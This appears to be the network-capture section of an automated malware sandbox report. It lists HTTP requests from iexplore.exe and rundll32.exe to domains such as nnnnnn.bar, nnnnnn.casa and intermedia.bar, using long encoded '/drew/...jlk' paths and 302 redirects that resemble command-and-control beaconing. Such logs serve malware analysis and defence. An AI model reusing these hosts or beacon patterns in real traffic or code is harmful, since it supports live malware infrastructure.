                  Jan 21, 2022 07:54:27.270412922 CET12376OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:29.161175013 CET12379OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:32.942723036 CET12380OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:40.493726969 CET12383OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.349879162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.590420008 CET12367OUTGET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:24.286071062 CET12373INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 53 41 73 52 57 57 52 63 67 41 59 62 58 35 4f 2f 73 50 49 55 73 46 46 38 5f 32 46 6e 32 75 4d 78 7a 41 2f 61 53 5f 32 42 31 4d 46 4f 2f 5f 32 42 39 76 74 71 6f 31 4d 32 5f 32 46 48 55 37 35 34 5f 2f 32 46 49 7a 5f 32 46 45 44 42 56 7a 46 52 56 32 79 37 70 2f 69 34 76 33 59 37 38 56 79 5f 32 42 70 5f 32 42 78 64 47 64 62 4d 2f 77 68 75 47 56 31 58 54 6f 78 34 68 63 2f 6a 63 4a 71 56 78 5f 32 2f 46 43 34 68 58 51 79 42 5f 32 46 76 48 72 6c 51 63 45 79 6b 66 62 4a 2f 33 6c 32 36 6c 35 33 68 6a 76 2f 49 42 59 75 47 6b 63 77 31 42 75 59 38 36 44 51 4a 2f 61 79 64 79 74 78 56 61 31 48 61 57 2f 73 77 77 44 62 50 38 37 49 78 4b 2f 78 4e 32 47 79 54 66 58 33 37 6d 35 70 54 2f 43 43 71 69 4c 36 35 39 62 6a 68 34 7a 6d 39 39 74 72 63 43 31 2f 68 34 69 32 74 57 4d 4c 36 54 4b 2f 59 46 55 4c 76 6d 71 74 37 43 50 2f 31 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
                  Jan 21, 2022 07:54:27.296308994 CET12377INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 53 41 73 52 57 57 52 63 67 41 59 62 58 35 4f 2f 73 50 49 55 73 46 46 38 5f 32 46 6e 32 75 4d 78 7a 41 2f 61 53 5f 32 42 31 4d 46 4f 2f 5f 32 42 39 76 74 71 6f 31 4d 32 5f 32 46 48 55 37 35 34 5f 2f 32 46 49 7a 5f 32 46 45 44 42 56 7a 46 52 56 32 79 37 70 2f 69 34 76 33 59 37 38 56 79 5f 32 42 70 5f 32 42 78 64 47 64 62 4d 2f 77 68 75 47 56 31 58 54 6f 78 34 68 63 2f 6a 63 4a 71 56 78 5f 32 2f 46 43 34 68 58 51 79 42 5f 32 46 76 48 72 6c 51 63 45 79 6b 66 62 4a 2f 33 6c 32 36 6c 35 33 68 6a 76 2f 49 42 59 75 47 6b 63 77 31 42 75 59 38 36 44 51 4a 2f 61 79 64 79 74 78 56 61 31 48 61 57 2f 73 77 77 44 62 50 38 37 49 78 4b 2f 78 4e 32 47 79 54 66 58 33 37 6d 35 70 54 2f 43 43 71 69 4c 36 35 39 62 6a 68 34 7a 6d 39 39 74 72 63 43 31 2f 68 34 69 32 74 57 4d 4c 36 54 4b 2f 59 46 55 4c 76 6d 71 74 37 43 50 2f 31 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
                  Jan 21, 2022 07:54:33.312299013 CET12382INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 53 41 73 52 57 57 52 63 67 41 59 62 58 35 4f 2f 73 50 49 55 73 46 46 38 5f 32 46 6e 32 75 4d 78 7a 41 2f 61 53 5f 32 42 31 4d 46 4f 2f 5f 32 42 39 76 74 71 6f 31 4d 32 5f 32 46 48 55 37 35 34 5f 2f 32 46 49 7a 5f 32 46 45 44 42 56 7a 46 52 56 32 79 37 70 2f 69 34 76 33 59 37 38 56 79 5f 32 42 70 5f 32 42 78 64 47 64 62 4d 2f 77 68 75 47 56 31 58 54 6f 78 34 68 63 2f 6a 63 4a 71 56 78 5f 32 2f 46 43 34 68 58 51 79 42 5f 32 46 76 48 72 6c 51 63 45 79 6b 66 62 4a 2f 33 6c 32 36 6c 35 33 68 6a 76 2f 49 42 59 75 47 6b 63 77 31 42 75 59 38 36 44 51 4a 2f 61 79 64 79 74 78 56 61 31 48 61 57 2f 73 77 77 44 62 50 38 37 49 78 4b 2f 78 4e 32 47 79 54 66 58 33 37 6d 35 70 54 2f 43 43 71 69 4c 36 35 39 62 6a 68 34 7a 6d 39 39 74 72 63 43 31 2f 68 34 69 32 74 57 4d 4c 36 54 4b 2f 59 46 55 4c 76 6d 71 74 37 43 50 2f 31 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.349880198.54.117.21180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:24.476659060 CET12374OUTGET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.349882192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:44.176512003 CET12384OUTGET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:54:47.055541039 CET12385INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:46 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 331
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 63 6c 4b 59 5f 32 46 39 71 68 58 4e 57 35 48 2f 5f 32 42 73 56 52 4b 49 67 4f 61 6d 69 45 39 6d 51 42 2f 5f 32 46 56 64 77 50 47 45 2f 42 50 4f 36 55 62 69 6e 57 5f 32 42 38 53 6a 70 5f 32 42 6f 2f 35 35 58 6d 66 37 48 4a 55 36 63 55 4a 79 38 66 79 34 5f 2f 32 46 4b 4b 44 4b 56 4b 49 53 5a 70 45 65 34 73 79 4c 4d 39 33 41 2f 4d 34 31 53 76 54 42 77 34 65 5f 32 46 2f 31 32 30 67 35 33 6d 49 2f 77 4a 4a 4d 71 39 33 7a 6d 4a 66 32 63 72 66 50 55 45 32 6a 5f 32 42 2f 47 4d 36 47 51 6f 4d 44 59 79 2f 42 37 43 55 41 31 5f 32 42 69 73 58 6e 4b 59 54 50 2f 75 47 6f 50 31 30 5f 32 42 78 48 6d 2f 69 6d 6b 52 55 6c 38 6f 72 31 6a 2f 42 77 36 78 37 5f 32 42 5a 71 68 68 30 78 2f 74 5f 32 46 38 33 33 43 57 33 67 7a 31 6c 5a 33 43 59 36 68 50 2f 4b 69 69 30 6f 59 59 78 52 47 73 63 38 48 64 48 2f 6c 6b 52 48 30 35 79 47 2f 64 4f 79 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.349883198.54.117.21280C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:47.258850098 CET12386OUTGET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.34974931.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:32.171870947 CET1138OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.349884192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:47.639854908 CET12388OUTGET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:54:49.835479975 CET12389INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 319
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 79 71 67 69 68 6a 6e 42 69 62 4a 37 41 2f 58 46 4d 37 30 78 50 43 2f 6b 36 65 69 57 4a 56 4a 71 4b 50 78 63 42 61 67 74 62 70 7a 59 7a 61 2f 4e 6c 48 45 62 45 6d 6d 69 37 2f 76 75 47 45 4a 4d 4e 6c 51 31 4f 62 68 56 32 6f 57 2f 72 64 39 46 34 7a 72 33 63 31 70 4a 2f 51 4b 46 5f 32 42 65 5f 32 46 51 2f 46 41 6a 49 74 43 55 78 4e 6e 63 5f 32 46 2f 41 5a 4c 4e 66 42 5f 32 46 30 77 45 6f 32 79 42 38 71 34 49 54 2f 35 6a 4f 6f 62 4a 54 6d 4f 5a 56 30 78 49 31 47 2f 50 51 43 55 4a 75 42 57 50 5f 32 42 68 56 76 2f 33 4b 65 46 55 72 4e 47 7a 5f 32 46 37 38 6c 4d 59 42 2f 73 54 64 31 75 74 6b 36 6e 2f 52 78 4b 48 6d 56 56 6a 30 36 32 79 4a 4a 4b 73 4a 39 4f 44 2f 77 6d 4e 36 78 52 37 32 48 42 54 49 31 76 63 74 48 51 65 2f 4e 32 47 65 4d 5a 72 77 49 30 74 2f 59 4c 57 32 43 53 7a 61 6f 2f 71 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  51192.168.2.349885198.54.117.21580C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:50.027798891 CET12390OUTGET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  52192.168.2.34988631.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:07.581451893 CET12394OUTGET /drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  53192.168.2.34988731.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:10.371342897 CET12395OUTGET /drew/nTzA1Bin3XQcZS3BPXoT/VC_2Bwejhc_2FIgAnHO/80iaugMV57_2B03WjjJnn8/4gxAs_2BxmZF7/TOVjb2Ah/pgPNUHZ17T9L8wycKkEjCiK/jeMuH8DdRv/juOnp0_2FGJ7c6qP0/x_2Fz3dEM_2F/deoZvnQAfFk/Wc5jOa5bWcm0MC/RWrwyt3pkcQtiY4AsZ3n7/MKKE_2FX_2FFdYj9/qoI9Xq_2BCQEmwG/Nwb7IgT0IyCbKBnKn_/2FiegfuYZI5/GhR0CO9.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  54192.168.2.349888192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:18.981075048 CET12396OUTGET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:19.141344070 CET12397INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:55:19 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 312
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk
                  X-Served-By: Namecheap URL Forward
